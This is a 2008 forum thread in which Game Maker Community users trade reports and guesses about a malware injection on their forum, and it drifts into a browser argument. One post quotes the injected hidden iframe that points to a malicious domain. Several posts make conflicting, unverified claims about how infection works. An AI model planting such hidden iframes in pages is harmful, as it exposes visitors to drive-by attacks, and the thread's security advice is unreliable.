Forum Viruses? Options

[NakedPaulToast]

And this is why you really should not be commenting, you don't have a clue as to what the significance that that screenshot implies.

As I said in my previous two posts, that no malicious code, has been executed yet.

[stinkoman_sd2008]

This is bad. Some thing popped up asking me if I wanted to run some Java program and it wanted to install some ActiveX control when I came on to this site. And now my AVG scanner has been disabled for unknown reasons. What should I do?

[SilentxxBunny]

My computer actually FOUND 2 viruses and a trojan on my PC from here, which I can delete, and all is well, but as soon as I restart my computer, there they are again. Luckilly they are (as of now) just taking up space, because my computer blocks them every time I turn on my computer.

[stinkoman_sd2008]

Okay. This Java thing popped up again and I took a screenshot of it.

The box was checked by defualt, but I clicked cancel.
Also, this has nothing to do with Vista or anything, since I am using XP skinned to look like Vista, so don't bring that up.

This post has been edited by stinkoman_sd2008: Sep 7 2008, 07:56 PM

[Dmaster270]

This is bad. Some thing popped up asking me if I wanted to run some Java program and it wanted to install some ActiveX control when I came on to this site. And now my AVG scanner has been disabled for unknown reasons. What should I do?

I'd go work on a game or come back later. And restart your computer.

[KC LC]

I'd go work on a game or come back later. And restart your computer.

Excellent advice. All the YYG Admins were notified about this when it first occurred. There's nothing more the GMC staff can do.

So anyone worried about this should definitely leave the GMC now. While you're gone you might want to re-install GM just to be safe.

[jakman4242]

I got absolutely nothing in FireFox. I even kept a steady eye on what pages were loading, over 10 GMC pages loaded over and over and I never found even one of the websites mentioned.(I did this earlier when the original "oh no" thread was posted.)

Now, I just got Google Chrome. I've been through about 5 GMC pages already, no warnings of any kind. I've done two computer scans since, with AVG, as well. So, yeah. I see no problems.

This post has been edited by jakman4242: Sep 7 2008, 08:09 PM

[Aertcz]

Why is there always a discussion bashing IE7. I never hear anything intelligent on how FF is so much better than IE. Personally I think some people just like FF, Chrome, Opera, etc. because it isn't "standard" with every computer and people like to be different. I've used both FF and IE. The only things i really saw a difference in was the gui (i think thats the right term) for downloading, and how when you go to view the source of a page, its formatted to look nice. I do know however that FF users have their temper tandrums when they dont get their YoYo Games Player fixes when a new version of FF comes out every 3 days.

[SilentxxBunny]

I think I found the attackers IP, I am not sure if this helps or not, but I am trying, so don't flame me if I am wrong.

[uuf6429]

So anyone worried about this should definitely leave the GMC now. While you're gone you might want to re-install GM just to be safe.

This is the funniest thing I've heard from here in some time!
I suggest taking KC_LC's advice without reading Anymore topics in this forum XD . Hahaha.

Oh, by the way, if Firefox tries executing it silently, while IE just breaks it off, I see it quit good in IE to do that.

I mean what is the point of security? Of blocking the threats or running them silently? Unless certain people here are completely stupid, other would know which is the obvious answer.

Now secondly, YOU CAN NOT GET INFECTED UNLESS YOU RUN THE JAR.
A browser only executes HTML/JS and cannot run malicious native code without the user's permission to download and run executable files.The only vulnerability in IE is those ActiveX controls, which I'm sure I know what one of them is being intended for (haha, I've known about that exploit a looong time ago - sorry, for order's sake I'll keep it secret). But in any case, IE has nothing to do with the exploits - only a small fraction has to do with IE. While at it, I'd like to be fair and mention that there are a lot of Firefox extensions which spy on you.

Anyway, I was wrong this problem was not fixed. The hacker seems to have some access to the forum in order to change the link.

I'll look into IPB eploits personally.

SilentxxBunny - Good, but you can find that URL by looking at the forum code. By the way, that's the new url.

This post has been edited by uuf6429: Sep 7 2008, 08:23 PM

[TD games]

Okay. This Java thing popped up again and I took a screenshot of it.

The box was checked by defualt, but I clicked cancel.
Also, this has nothing to do with Vista or anything, since I am using XP skinned to look like Vista, so don't bring that up.

I get that aswell but using IE7. I'm glad somebody brought that up. But also ***** A.P.P.L.E.T in the bottom left where the page loads pops up everytime i refresh a page on the GMC.

This post has been edited by TD games: Sep 7 2008, 08:49 PM

[edmunn]

From the source code:

<iframe src="http://inetppui.com/html/3767/90281401124fd0c93474c063e1cae5b4/" width="0" height="0" style="display:none"></iframe></a>

Done some research, the virus can disguise itself as this in the system32 folder, although it is present in all system32 folders.

Safest option IMO would be to temporarily close the forum, and look for potential leaks on the forum.

This post has been edited by edmunn: Sep 7 2008, 09:16 PM

[Dr. Watz0n]

As edmunn said above, the virus will place itself inside the system32 folder of your computer. If you where to execute the malicious code, you would simply be redirected back to Google, while the above files would be injected into your system. As to what the virus does, I have no idea.

[edmunn]

As edmunn said above, the virus will place itself inside the system32 folder of your computer. If you where to execute the malicious code, you would simply be redirected back to Google, while the above files would be injected into your system. As to what the virus does, I have no idea.

Me eiother, I can't find much about it.
Still curious that it's on the GMC page, must be something related to virus'.

Found some information
It is a virus, that checks for 2certain vulnerable Quicktime browser objects.2

http://malwaredatabase.net/blog/index.php/2008/09/06/exploit-page-installs-msupd_0809_upd070148exe-video/

This post has been edited by edmunn: Sep 7 2008, 09:22 PM

[Dr. Watz0n]

From Google (regarding augreat.mine.nu):

Malicious software includes 5204 scripting exploit(s), 745 trojan(s). Successful infection resulted in an average of 0 new processes on the target machine.

On top of that, Google lists that the virus has infected, as of now, 311 domains. We can conclude that the GMC may be one of them, as the alert clearly shows when visiting the GMC.

For those who are interested, here is the full report.

[correojon]

Is anyone using FF with NoScript? I get an alert of NoScript blocking "inetppui.com", though I don´t remember if I usually get this...

[samscam]

We are safe for now. The page that is loaded in the iframe, changes now and then. The page that is currently beeing loaded, results in a

404 Not Found
error. BUT Chrome will keep saying that the GMC is infected because the page still contains the iframe.

[Dr. Watz0n]

Just out of curiosity, how many people are actually using Chrome full/part time, beyond testing it? Honestly, I find that it really is a truly lacking browser.

[Dylijn]

I have Nod32 and its one of the best anti virus in the world, if you dont believe me go to www.nod32.com
And the Nod32 Internet Monitor showed this trojan downloader page on 21:00 h .
So its still here and the virus is spreading via google.

People should just have a good anti virus and NOT one thats free ! cuz those are really bad.

[uuf6429]

Edmunn - We know about that, that is what I found back when I and Hach reported the virus, except it was a different URL.
I have no idea where you got that info about the system32 thing. The virus can't magically apear into that folder unles:
-You gave permission to do that
-You are using Google's high security Chrome

spacerat - You are the idiot. IE is not the best but it is not what you're calling it.
You'de be a complete idiot comparing IE to Firefox. In IE you can always cancel running ActiveX or downloading programs. In firefox you can download extensions which spy on you disguised as a weatherbug or a super toolbar. Guess what, statistics show Firefox has a lot of malicious extensions then IE. Problems in IE are exploits. But consider this: if Firefox can't even filter bad extensions let alone fixing exploits.
Please, you've already showed us your highly intelligent comments, no need to show off your super skills in how web coding works.
As to your list of why people should choose firefox, here's a list of why you should shut up and leave people with their decissions:

1) IE supports a wide range of protocols which or only available in firefox with some badly built extensions. I would rather prefer to see a malformed site ratherthen none at all.
2) Try check memory and time in opening IE7 and FF3: IE7 loads in about 2 seconds, FF 6. IE used 7Mb on this page, FF uses 13Mb. Not nice, eh?
3) FF has a huge repertoire of extensions (which spy on you) and I expect Chrome will (not) have the same (Chrome as said on their site, will be a simplistic functional browser without addons of any type). All IE has is a bunch of crappy toolbars and some drive-by viruses (if you are stilling using IE 5.5, but it is a fact that most viruses in IE are cought due to user error/stupidity).

By the way, let's see how much you'd love firefox after reading:
http://home.comcast.net/~SupportCD/FirefoxMyths.html
(also verified by http://www.techspot.com/vb/topic44405.html)

Dr. Watz0n - I find Chrome interesting, but highly dislike their lies about it being secure. No browser can be secure enough - believe me. If you want, check the link about Chrome I gave. It is also interesting to note that in the last week, there's been more then 4 exploits found to DOS (crash) Chrome.

Dylijn - People should start not inventing things.
1) Google ain't spreading any virus. If you read my previous posts, the bad code tries to get into your gmail/google services acount and get your data. Don't worry, you password will be secure if you didn't save it in any email. This method is called XSS, which I've outlined how it works.
2) Commercial antiviruses are quite good, but you can't assume it is good just because of that. People assume too much things about security. My Avast 4 (free) alerted me about the virus and gave me the ability to abort the connection; meaning the virus has even touched my computer.
In my life, I've used several antiviruses including avg, nod and mccafe. Avast has done the job and persisted my preference through time.

Unlike some people around, which believe in the common lies, my preference is FAR from biased.

This post has been edited by uuf6429: Sep 7 2008, 09:48 PM